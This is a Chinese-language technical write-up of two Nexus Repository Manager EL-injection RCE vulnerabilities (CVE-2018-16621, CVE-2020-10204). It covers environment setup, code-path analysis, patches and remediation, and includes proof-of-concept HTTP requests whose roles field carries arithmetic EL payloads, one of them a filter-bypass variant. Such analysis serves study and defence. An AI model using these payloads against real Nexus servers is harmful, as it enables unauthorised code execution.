Nexus Repository UserComponent远程代码执行漏洞浅析(CVE-2018-16621&CVE-2020-10204)
字数 1269 2025-08-20 18:17:53
Nexus Repository UserComponent远程代码执行漏洞分析(CVE-2018-16621 & CVE-2020-10204)
漏洞概述
Nexus Repository OSS是一款通用的软件包仓库管理服务。Sonatype Nexus Repository Manager 3中存在远程代码执行漏洞,涉及接口为/service/extdirect,需要管理员账户权限访问。该漏洞通过UserComponent对象注解校验时使用EL引擎渲染,构造恶意JSON数据可导致EL表达式注入,进而实现远程代码执行。
受影响版本
CVE-2018-16621
- 受影响版本:Nexus Repository Manager OSS/Pro 3.x - 3.13
- 修复版本:Nexus Repository Manager OSS/Pro 3.14
- CVSS评分:7.1(高危)
CVE-2020-10204
- 受影响版本:Nexus Repository Manager OSS/Pro 3.x -3.21.1
- 修复版本:Nexus Repository Manager OSS/Pro 3.21.2
- CVSS评分:9.1(紧急)
环境搭建
CVE-2018-16621环境
-
下载Nexus源码:
git clone https://github.com/sonatype/nexus-public.git cd nexus-public git checkout -f -b release-3.13.0-01 remotes/origin/release-3.13.0-01 -
拉取Docker镜像:
docker pull sonatype/nexus3:3.13.0 -
运行容器(启用调试):
docker run -d --rm -p 8081:8081 -p 5050:5050 --name nexus -v /path/to/nexus-data:/nexus-data -e INSTALL4J_ADD_VM_PARAMS="-Xms2g -Xmx2g -XX:MaxDirectMemorySize=3g -Djava.util.prefs.userRoot=/nexus-data -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5050" sonatype/nexus3:3.13.0
CVE-2020-10204环境
-
切换分支:
cd nexus-public git checkout -f -b release-3.14.0-04 remotes/origin/release-3.14.0-04 -
拉取Docker镜像:
docker pull sonatype/nexus3:3.14.0 -
运行容器(同上)
漏洞复现
CVE-2018-16621 POC
POST /service/extdirect HTTP/1.1
Host: target.com:8081
Content-Type: application/json
Cookie: NXSESSIONID=your_session_id
{
"action": "coreui_User",
"method": "update",
"data": [{
"userId": "admin",
"version": "2",
"firstName": "admin",
"lastName": "User",
"email": "admin@example.org",
"status": "active",
"roles": ["exp|${222*6}|"]
}],
"type": "rpc",
"tid": 11
}
CVE-2020-10204 POC
POST /service/extdirect HTTP/1.1
Host: target.com:8081
Content-Type: application/json
Cookie: NXSESSIONID=your_session_id; NX-ANTI-CSRF-TOKEN=your_token
{
"action": "coreui_User",
"method": "create",
"data": [{
"userId": "admin",
"version": "2",
"firstName": "admin",
"lastName": "User",
"email": "admin@example.org",
"status": "active",
"roles": ["exp|$\\A{2*333}|"]
}],
"type": "rpc",
"tid": 11
}
漏洞分析
漏洞触发流程
- 请求进入
HttpServlet#service方法 - 通过
DirectJNgineServlet#doPost处理POST请求 JsonRequestProcessor#processIndividualRequest解析JSON数据- 通过反射调用
UserComponent#update或create方法 - 触发
@Validate注解校验 RolesExistValidator#isValid处理roles参数- 恶意表达式传入
buildConstraintViolationWithTemplate - EL表达式解析执行
关键代码分析
UserComponent处理
@Named
@Singleton
@Consumes({APPLICATION_JSON})
@Produces({APPLICATION_JSON})
@Path(UserComponent.RESOURCE_URI)
public class UserComponent
{
@PUT
@Path("update")
@Validate
public UserXO update(final UserXO user) {
// ...
}
}
RolesExistValidator校验
public class RolesExistValidator extends ConstraintValidatorSupport<RolesExist, Collection<?>> {
@Override
public boolean isValid(final Collection<?> value, final ConstraintValidatorContext context) {
// ...
context.buildConstraintViolationWithTemplate("Missing roles: " + missing)
.addConstraintViolation();
return false;
}
}
EL表达式解析
最终调用栈到达:
com.sun.el.ValueExpressionImpl#getValue
补丁分析
CVE-2018-16621补丁
在RolesExistValidator中添加了EL表达式过滤:
org.sonatype.nexus.common.template.EscapeHelper#stripJavaEl
过滤方式为将${替换为{
CVE-2020-10204补丁
改进了过滤逻辑,处理更多变体:
org.sonatype.nexus.common.template.EscapeHelper.java
修复建议
- 升级到最新版本:
- CVE-2018-16621:升级至3.14或更高
- CVE-2020-10204:升级至3.21.2或更高
- 限制管理员账户访问
- 监控
/service/extdirect接口的异常请求